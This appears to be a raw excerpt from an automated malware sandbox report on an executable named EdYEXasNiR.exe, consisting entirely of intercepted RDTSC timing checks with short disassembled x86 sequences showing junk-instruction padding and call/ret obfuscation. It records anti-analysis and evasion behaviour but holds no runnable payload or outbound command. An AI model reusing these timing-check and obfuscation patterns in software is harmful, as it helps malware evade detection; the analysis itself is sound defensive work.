                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6B28 second address: EA6B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8F13 second address: EC8F18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8F18 second address: EC8F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8F1E second address: EC8F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD358DA46E1h 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8F36 second address: EC8F62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1107h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e js 00007FD358ED10F8h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8F62 second address: EC8F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8F66 second address: EC8F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC6FE1 second address: EC6FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC6FE5 second address: EC7006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358ED1101h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jg 00007FD358ED10F6h 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC72D3 second address: EC72F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jmp 00007FD358DA46E6h 0x0000000b pop edx 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC72F6 second address: EC7300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD358ED10F6h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7300 second address: EC7304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7481 second address: EC7487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC78C8 second address: EC78CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC78CE second address: EC78F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1100h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD358ED10FCh 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7D06 second address: EC7D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7D0C second address: EC7D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7D13 second address: EC7D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD358DA46D6h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7D1D second address: EC7D21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC7E7D second address: EC7EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD358DA46E9h 0x0000000d popad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC81AB second address: EC81C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED10FBh 0x00000007 jo 00007FD358ED10F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC81C0 second address: EC81C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC86EE second address: EC86FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EC8B10 second address: EC8B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E87BB5 second address: E87BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E87BB9 second address: E87BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E87BBF second address: E87BC4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E87BC4 second address: E87BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FD358DA46D6h 0x0000000d jc 00007FD358DA46D6h 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ECFA5E second address: ECFA7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ECE2A0 second address: ECE2BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46E7h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED380D second address: ED3811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED3811 second address: ED3817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED3BEE second address: ED3BF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED3BF5 second address: ED3C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007FD358DA46D8h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FD358DA46E5h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED3C22 second address: ED3C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FD358ED1103h 0x0000000b jmp 00007FD358ED10FDh 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E89792 second address: E897A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FD358DA46DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E897A0 second address: E897A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED7B99 second address: ED7B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED7CE2 second address: ED7CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED7E57 second address: ED7E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED7FFC second address: ED8002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED9B8B second address: ED9C06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FD358DA46D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FD358DA46D8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FD358DA46D8h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ecx 0x0000004c call 00007FD358DA46D8h 0x00000051 pop ecx 0x00000052 mov dword ptr [esp+04h], ecx 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc ecx 0x0000005f push ecx 0x00000060 ret 0x00000061 pop ecx 0x00000062 ret 0x00000063 push eax 0x00000064 push ebx 0x00000065 jbe 00007FD358DA46DCh 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: ED9A40 second address: ED9A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDACAF second address: EDACC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46DDh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDACC0 second address: EDAD5B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD358ED10F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FD358ED1101h 0x00000013 jnp 00007FD358ED110Ah 0x00000019 jmp 00007FD358ED1104h 0x0000001e popad 0x0000001f nop 0x00000020 mov dword ptr [ebp+122D246Fh], esi 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D3175h], eax 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007FD358ED10F8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a jmp 00007FD358ED1107h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FD358ED1108h 0x00000057 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDD7DE second address: EDD7E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDD7E2 second address: EDD84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FD358ED10F8h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 xor si, 4800h 0x00000026 push 00000000h 0x00000028 add edi, dword ptr [ebp+122D2384h] 0x0000002e push 00000000h 0x00000030 mov esi, edi 0x00000032 mov esi, dword ptr [ebp+122D3851h] 0x00000038 xchg eax, ebx 0x00000039 jmp 00007FD358ED1109h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FD358ED1101h 0x00000048 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDD84E second address: EDD854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE1F1D second address: EE1F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE1F21 second address: EE1F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 stc 0x00000009 push 00000000h 0x0000000b jl 00007FD358DA46E8h 0x00000011 call 00007FD358DA46DFh 0x00000016 mov ebx, edx 0x00000018 pop edi 0x00000019 push 00000000h 0x0000001b or dword ptr [ebp+122D1C69h], esi 0x00000021 mov dword ptr [ebp+122D2162h], ebx 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a jg 00007FD358DA46DCh 0x00000030 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE2F6E second address: EE2F73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE5016 second address: EE501A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE501A second address: EE5059 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD358ED10F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c sub ebx, dword ptr [ebp+122D315Dh] 0x00000012 push 00000000h 0x00000014 movsx edi, di 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FD358ED10F8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov bx, si 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE20A8 second address: EE20B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE4008 second address: EE4091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jc 00007FD358ED10F6h 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FD358ED10F8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b sbb di, FC3Eh 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov ebx, dword ptr [ebp+122D26DEh] 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 movsx ebx, ax 0x00000047 mov eax, dword ptr [ebp+122D001Dh] 0x0000004d push 00000000h 0x0000004f push ebx 0x00000050 call 00007FD358ED10F8h 0x00000055 pop ebx 0x00000056 mov dword ptr [esp+04h], ebx 0x0000005a add dword ptr [esp+04h], 00000017h 0x00000062 inc ebx 0x00000063 push ebx 0x00000064 ret 0x00000065 pop ebx 0x00000066 ret 0x00000067 add dword ptr [ebp+122D2AA8h], edi 0x0000006d push FFFFFFFFh 0x0000006f mov edi, dword ptr [ebp+122D3226h] 0x00000075 mov ebx, dword ptr [ebp+122D3717h] 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e push ecx 0x0000007f push ebx 0x00000080 pop ebx 0x00000081 pop ecx 0x00000082 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE6062 second address: EE6066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE7035 second address: EE7046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jns 00007FD358ED10F6h 0x00000010 pop eax 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE8066 second address: EE806C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE718E second address: EE7194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE806C second address: EE8087 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FD358DA46D6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FD358DA46DAh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE901E second address: EE9023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EE9210 second address: EE92BB instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD358DA46D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FD358DA46D8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D394Dh] 0x0000002b or dword ptr [ebp+122D359Bh], ebx 0x00000031 push dword ptr fs:[00000000h] 0x00000038 jnl 00007FD358DA46DAh 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 add dword ptr [ebp+122D199Dh], eax 0x0000004b mov eax, dword ptr [ebp+122D0331h] 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 call 00007FD358DA46D8h 0x00000059 pop eax 0x0000005a mov dword ptr [esp+04h], eax 0x0000005e add dword ptr [esp+04h], 0000001Dh 0x00000066 inc eax 0x00000067 push eax 0x00000068 ret 0x00000069 pop eax 0x0000006a ret 0x0000006b mov di, si 0x0000006e and edi, 120E23DCh 0x00000074 push FFFFFFFFh 0x00000076 jp 00007FD358DA46DBh 0x0000007c mov ebx, 05CD329Bh 0x00000081 nop 0x00000082 push eax 0x00000083 push edx 0x00000084 jmp 00007FD358DA46DDh 0x00000089 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EEBDE6 second address: EEBE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FD358ED10F8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FD358ED10F8h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 00000017h 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e jmp 00007FD358ED1108h 0x00000043 jg 00007FD358ED10FCh 0x00000049 push 00000000h 0x0000004b js 00007FD358ED10FCh 0x00000051 sub edi, 1D537A98h 0x00000057 push eax 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EEBE6B second address: EEBE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EECDA6 second address: EECDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EEB0BF second address: EEB0C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EEA14A second address: EEA14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2EECC second address: F2EEE8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD358DA46DEh 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2EEE8 second address: F2EEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2EEEC second address: F2EEF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2EEF0 second address: F2EEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2F4B5 second address: F2F4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F2F4BB second address: F2F4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F337D0 second address: F337DA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD358DA46D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F337DA second address: F337E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F337E0 second address: F337F7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD358DA46DCh 0x00000008 pushad 0x00000009 ja 00007FD358DA46D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F337F7 second address: F337FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
